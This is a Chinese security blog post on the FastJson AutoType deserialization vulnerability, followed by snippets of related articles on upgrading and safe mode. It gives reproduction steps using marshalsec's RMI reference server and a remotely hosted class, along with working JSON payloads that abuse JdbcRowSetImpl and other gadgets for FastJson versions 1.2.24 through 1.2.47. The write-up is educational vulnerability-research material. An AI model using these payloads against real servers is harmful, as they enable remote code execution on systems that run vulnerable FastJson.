FastJson-安全

已于 2024-12-03 10:09:47 修改
阅读量4.5k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: Web安全 文章标签: java json 安全
于 2022-01-03 21:28:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/122292956
本文详细介绍了FastJson的AutoType特性及其在版本1.2.24及以前存在的安全问题。攻击者可以利用AutoType功能构造恶意JSON字符串,触发JNDI注入攻击。通过启动RMI服务器并指定远程类加载,可能导致代码执行。FastJson在后续版本中对此进行了修复,但攻击者不断寻找新的绕过方式。文章还展示了漏洞利用的调用栈,并提供了不同版本的exploit示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1 FastJson介绍

Fastjson 是阿里巴巴开源的 Java 库,用于将 Java 对象转换为 JSON 字符串,以及将 JSON 字符串转换为 Java 对象。这个库的一个关键特性是它的反序列化能力,即将 JSON 字符串转换回 Java 对象。

把一个Java对象转换成字符串,有两种选择:

1)基于属性

fastjson引入了AutoType,即在序列化的时候使用@type字段,标注了类对应的原始类型,方便在反序列化的时候定位到具体类型。

2)基于setter/getter

当我们要对他进行序列化的时候,fastjson会扫描其中的getter方法,即找到getName和getFruit,这时候就会将name和fruit两个字段的值序列化到JSON字符串中。

这个特性也带来了安全风险,特别是在 Fastjson 版本 1.2.24 及之前,存在一个反序列化漏洞,允许攻击者执行远程代码。

Fastjson 在反序列化时,会读取 JSON 中的 @type 字段来确定对象的类型,并调用相应类的 setter 方法。这个过程中,如果 @type 被恶意构造,攻击者可以指定任意类库,通过精心构造的 JSON 字符串,触发恶意行为。 

2 fastjson<=1.2.24

2.1 介绍

fastjson(v1.2.25 之前)的AutoType是默认开启的,也没有什么限制。 可以利用autoType这个特性,自己构造一个JSON字符串,并且使用@type指定一个自己想要使用的攻击类库。

比如利用com.sun.rowset.JdbcRowSetImpl这个类的dataSourceName传入一个rmi的源。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:port/Exploit","autoCommit":true}

JdbcRowSetImpl类的基本原理见:JNDI注入

2.2 复现方式

首先创建一个远程加载的类

 启动web服务

这样访问http://IP1:3333/MyTest.class就可以访问到class文件。 然后我们借助marshalsec启动一个RMI服务器,监听9999端口,并制定加载远程类MyTest.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://IP1:3333/#MyTest" 9999 (注意IP保密)

最后传入:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://IP2:9999/MyTest","autoCommit":true}

2.3 FastJson调用栈

详见流程见fastjson=1.2.24调试。

Exploit小结:

来源于  https://github.com/shengqi158/fastjson-remote-code-execute-poc

1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

未知版本(1.2.24-41之间)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

3 fastjson=1.2.24调试

1)class JSON类

pasre(String text)如下

2)class DefaultJSONParser类

当为{时,token=12

token=12,继续parseObject

来到parseObject(Map object, Object fieldName)

这里有一个 JSONLexerBase.scanSymbol,作用是找一对“”之间的内容

第一对“”里就是“@value”,判断key = @type继续走

3)class TypeUtils类

4)class DefaultJSONParser类

5)class ParserConfig类

6)返回之后继续来到class DefaultJSONParser,执行deserializer.deserialze(this, clazz, fieldName);

然后来到class JavaBeanDeserializer

7)继续往下走,来到 class JSONScanner

8) JavaBeanDeserializer类

9)FieldDeserializer类

反射调用

后面就是JdbcRowSetImpl正常流程了,见JNDI注入

Java安全-Fastjson漏洞
m0_63138919的博客
03-28 4341
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
【Linux】升级FastJSON版本-jar
m0_52985087的博客
07-09 3029
在长期运行的应用服务器上,近期的安全漏洞扫描揭示了fastjson组件存在潜在的安全隐患(FastJSON是一个Java 语言实现的 JSON 解析器和生成器。FastJSON存在远程代码执行漏洞,恶意攻击者可以通过此漏洞远程执行恶意代码来入侵服务器)。为解决这一漏洞,解决方案是对fastjson版本的升级,以增强系统的安全性。为了避免因重新打包整个应用带来的不便与效率损失,我们采取了一种更为灵活的更新策略——直接在生产环境中升级fastjson至最新稳定版本。
fastjson-1.2.66版 2020年最新发布,继续加固安全
03-13
fastjson 1.2.66 已发布,这又是一个维护版本,修复了一些 BUG,并且做安全加固,补充了 AutoType 黑名单。 Issues 修复某些场景下BeanToArray报错的问题 修复某些场景多版本共存导致的的兼容问题 修复JSONArray构造方法中,由null List会引发的NPE问题 修复大对象某些场景会报错的问题 #2779 修复字符串自动转换为数值时,小数点后全零报错的问题 #2838 修复某些场景下不识别Kotlin泛型的问题 修复开始SupportNonPublicField特性后JSONField配置name不支持private字段的问题 #2866 修复纳秒级 Timestamp 解析异常问题 #2894 日期自动识别增强对纳秒时间的支持的 支持对Queue类型的反序列化 修复JSONField 在LocalDateTime类型时 format 不生效问题 修复JSONValidator有些场景不能识别非法JSON数据的问题 #3017 加强安全防护
安全版本fastjson
karlif的博客
10-27 1040
记录一下安全版本fastjson
Fastjson反序列化
最新发布
一个热衷于网络安全的技术宅,这里记录我的学习轨迹、漏洞分析、CTF复盘和一些偏门技巧。 偶尔翻翻协议,常常调调漏洞,目标是在0和1之间找到属于自己的战斗力。
04-17 1145
JSON是一种轻量级的数据交换格式.它使用键值对(key-value)的结构表示数据,易于人阅读和编写,也易于机器解析和生成。虽然起源于 JavaScript,但现在已经成为编程语言之间通信的通用格式,比如在前后端之间传输数据、配置文件、接口请求等场景中广泛使用。
2024年Fastjson开启安全模式5种方法(VIP典藏版)(1),2024年最新网络安全开发热门前沿知识
05-10 1707
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
推荐项目:Fastjson-Blacklist - 安全增强版Fastjson
gitblog_00042的博客
04-25 458
推荐项目:Fastjson-Blacklist - 安全增强版Fastjson 去发现同类优质开源项目:https://gitcode.com/ 是一个基于阿里巴巴开源的 Fastjson安全增强版本,旨在为开发者提供更安全、可控的数据序列化与反序列化体验。Fastjson是一个Java语言编写的高性能功能完备的JSON库,而Fastjson-Blacklist则在此基础上添加了针对某些已知漏...
fastjson-1.2.66_fastjson-1.2.66.jar_Fastjson_
09-30
《深入解析Fastjson 1.2.66版本》 Fastjson是阿里巴巴开源的一个高性能的JSON库,它在Java世界中被广泛使用,为开发者提供了快速、方便地处理JSON数据的能力。Fastjson 1.2.66是该库的一个稳定版本,其核心功能包括...
fastjson-1.2.9.jar.zip
12-23
5. **安全增强**: 针对 JSON 注入等安全问题,Fastjson 提供了安全模式,可以防止恶意数据注入。 综上所述,Fastjson 是一个强大且易用的 JSON 解析工具,广泛应用于各种 Java 项目中。其高效的性能、丰富的功能...
fastjson-1.2.83 针对近期阿里fastjson包漏洞,升级解决
05-24
Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全
高版本的fastjson-1.2.71解决安全漏洞.rar
04-14
然而,随着广泛使用,Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和其他安全风险。在标题提到的“高版本的fastjson-1.2.71解决安全漏洞”中,我们主要关注的是Fastjson如何通过...
最新版 fastjson-1.2.68.jar
04-16
总的来说,Fastjson-1.2.68.jar作为最新版本,不仅继承了Fastjson一贯的高性能和易用性,还针对安全性和兼容性进行了优化。对于Java开发者来说,它是一个值得信赖的JSON处理工具,无论是在日常开发还是在处理大数据...
autotype安全 fastjson_Fastjson 安全更新,建议升级到 1.2.28 或更新版本
weixin_39640008的博客
12-22 1017
安全升级公告最近发现 fastjson 在 1.2.24 以及之前版本存在高危安全漏洞,为了保证系统安全,请升级到 1.2.28 或者更新版本。更新方法1. Maven 依赖配置更新通过 maven 配置更新,使用最新版本,如下:com.alibabafastjson1.2.282. 直接下载常见问题1. 升级遇到不兼容问题怎么办?1.2.28 已经修复了绝大多数兼容问题,但是总会有一些特殊的用法...
Fastjson开启安全模式5种方法(VIP典藏版)
慕白Lee的博客
06-08 1万+
一、Fastjson漏洞事件始末 1、AutoType 2、AutoType是谁-为啥使用-为啥出错 3、目前已升级至1.2.83 二、打开SafeMode功能 1. 在代码中配置 2. 加上JVM启动参数 3. 通过fastjson.properties文件配置。 4. safeMode场景如何做autoType 5. 怎么判断是否用到了autoType 6. 使用JSONType.autoTypeCheckHandler......
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 2985
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
fastjson开启安全模式
wenlai123456的博客
09-03 4180
方式4:通过fastjson.properties文件配置。方式2:针对某个解析配置。方式3:JVM启动参数。
安全漏洞:Fastjson反序列化漏洞
热门推荐
孤芳不自赏
05-27 1万+
引言 昨天,我收到了集团安全部门的告警消息:Fastjson≤1.2.80版本存在反序列化漏洞,好家伙,着手开搞,这又是一个不眠夜的开始,哦,为什么说“又”呢?还记得去年12月份log4j2报过重大安全漏洞…… 风险描述 fastjson已使用黑白名单用于防御序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全 影响版本 Fastjson≤1.2.80 解决方案1:升级到最新版本1.2.83..
FastJSON安全漏洞
隐心咒Amor的博客
11-22 253
安全漏洞
FastJson安全模式,开启后关闭类型隐式传递
m0_63159822的博客
01-19 1781
但是,FastJson 在解析 JSON 字符串时存在一定的安全风险,如果输入的 JSON 字符串中包含恶意代码,就有可能导致系统被攻击。为了解决这个问题,FastJson 提供了一种安全模式(safe mode),可以在解析 JSON 字符串时检测其中是否包含恶意代码,从而防止系统被攻击。在安全模式下,FastJson 会严格限制 JSON 字符串的内容,只允许简单的 JSON 格式。这样,当使用 FastJson 解析 JSON 字符串时,就会自动启用安全模式,从而提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值